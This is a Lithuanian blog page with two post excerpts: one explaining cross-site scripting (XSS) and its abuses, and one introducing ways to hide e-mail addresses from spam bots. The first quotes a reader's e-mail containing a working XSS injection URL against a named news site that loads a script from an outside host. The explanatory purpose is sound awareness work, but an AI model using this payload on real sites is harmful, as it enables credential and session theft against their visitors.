Kadangi senai rašiau apie web saugumą, apklausoje daugiausiai balsų kol kas renka praktinių pamokų noras, o dar ir į el. paštą atėjo su tuo susijęs laiškas, tad šiandien ir parašysiu apie šiuo metu populiariausią ir daug diskusijų keliantį tinklalapių pažeidžiamumą. Tas web pažeidžiamumų pirmūnas yra Cross Site Scripting, kuris trumpinamas tiesiog XSS. XSS, o ne CSS todėl, kad tiesiog nebūtų painiojama su Cascading Style Sheets. Pagal įvairius duomenis jis sutinkamas 75%-80% tinklalapių. Lietuviški nei kiek neatsilieka. Kaip pasireiškia tas pažeidžiamumas? Pažeidžiamumas yra nukreiptas ne prieš pačius tinklalapius, bet prieš jų vartotojus. Jei tinklalapyje yra palikta tokia skylė, tuomet jo lankytojui galima pakišti papildomą HTML kodą arba skriptą, kurį lankytojo naršyklė apdoros ir įvykdys kaip originalų. Ką su tuo galima padaryti? Kai tik toks pažeidžiamumas buvo atrastas, tuomet dažniausiai buvo tiesiog dedamas Java skriptas, kuris vykdydavo amžiną ciklą ir mesdavo lankytojams nesibaigiantį pranešimą. Žodžiu, toks “baeris”, kuris neduodavo normaliai naršyti. Vėliau sėkmingai buvo pradėtos klastoti tinklalapių dalys. Pvz. bankinėje sistemoje ant originalių prisijungimo laukelių uždėdavo niekuo nesiskiriančius padirbtus prisijungimo langelius, kurie tiesiog surinkdavo prisijungimo duomenis ir persiųsdavo nusikaltėliams. Vėliau, be puslapių klastojimo į darba stipriai buvo “pajungti” visokie skriptai, vykdomi naršyklėje. Dabar JavaScript’o pagalba vagiami duomenys, apeinant ugniasienę patikrinamas vidinio tinklo saugumas, išnaudojami įvairūs pažeidžiamumai (pvz. perkonfigūruojami vidiniai router’iai), perimamos naršymo sesijos, admino teisės, pavagimai ištisi blogai ir t.t. Žodžiu, galimybių daug. Jei koks nors programuotojas sako, kad čia š…, o ne pažeidžiamumas, tai sumažinkit jam algą (arba pasiūlykit tą padaryti jo šefui). Dvigubai. Kol netnaujins žinių. Jei toks programuotojas esi tu pats, tai skubėk pasitasyti, kol tavo šefas tau nesumažino algos. Dvigubai. O jei rimtai, tai šiandien, išnaudojantys XSS pažeidžiamumą, po internetą jau sklando virusai ir valdomi botnet’ai. Tiesa, botnet’e dalyvis aktyvus būna tol, kol veikia naršyklė. Ir jei neišnaudojami kiti naršyklės pažeidžiamumai ir nepavyksta įkišti į OS kokio papildomo malware’o, tai iš tokio botnet’o pasišalinama tiesiog uždarant naršyklę. Žodžiu, čia buvo šiek tiek teorijos. Dabar kaip visa tai atrodo gyvai. Štai čia ir pacituosiu prieš kurį laiką man atėjusį laišką (kalba netaisyta).

Sveiki,
Siunčiu informacijos, kuri gali pasirodys įdomi.
Galbūt teko girdėti apie tinklapį xssed.com. Taigi turiu surinkęs
keletą lietuviškų tinklapių su tapačiu pažeidimu.
http://www.xssed.com/archive/author=F3nix/
Yra ir info.lt, delfi.lt ir t.t.
Delfi.lt tiesiog stebina savo aplaidumu. XSS skylė vis dar neužtaisyta, nors nuo pranešimo administratoriam praėjo bemaž pusė metų.

http://www.delfi.lt/archive/article.php?id=1625&s2f=1&sendit=1&fromName=%3Cscript%20
src=http://lol.freehost.lt/1.js%3E%3C/script%3E

Skaityti visą įrašą…

Pasižiūrėjau savo BLOG’o statistiką. Skaitomiausias straipsnis buvo apie blogas.lt BLOG’ų vagystes, kurio aprašyta problema vis dar nesutvarkyta (nors ir buvo žadėta) bei kavą už 50 Lt. Atrodo, kad mano BLOG’o skaitytojus labiau domina blogi dalykėliai ir nutikimai nei geri. Tačiau prieš pradėdamas gan ilgą įrašų ciklą apie tai kaip laužiamos programos, aš šiandien neatsižvelgsiu į populiarias temas ir parašysiu apie nesudėtingas apsaugos priemones. Pagaliau pabūsiu šiek tiek ir “geriečiu”. Parašysiu apie tai, kaip didinant saugumą nesumažinti funkcionalumo vartotojui.

Tinklalapių autoriai ir juos prižiūrintys asmenys labai gerai žino tą problemą, kai į tinklalapį įdėjus savo el. pašto adresą labai greitai į jį pradeda ateiti visokie reklaminiai laiškai. Tai reiškia, kad Jūsų el. pašto adresas tinklalapyje buvo sėkmingai suindeksuotas blogų paieškos robotų ir įtrauktas į el. pašto duomenų bazes, kuriems gali būti sėkmingai siunčiamas spam’as. Kad apsisaugotų nuo tokių robotų, autoriai savo el. pašto adresą pradeda visaip darkyti, kad jų neatpažintų ir nesuindeksuotų tie blogiečiai robotai. Tada el. pašto adresai būna užrašomi visaip taip: aaa[eta]gmail.com arba _NO_SPAM_aaa@gmail.com, vietoj @ simbolio dedamas jį vaizduojantis paveikslėlis ir t.t. Šie būdai dažnai suklaidina paieškos robotus, bet įveda ir papildomo nepatogumo lankytojams.
Skaityti visą įrašą…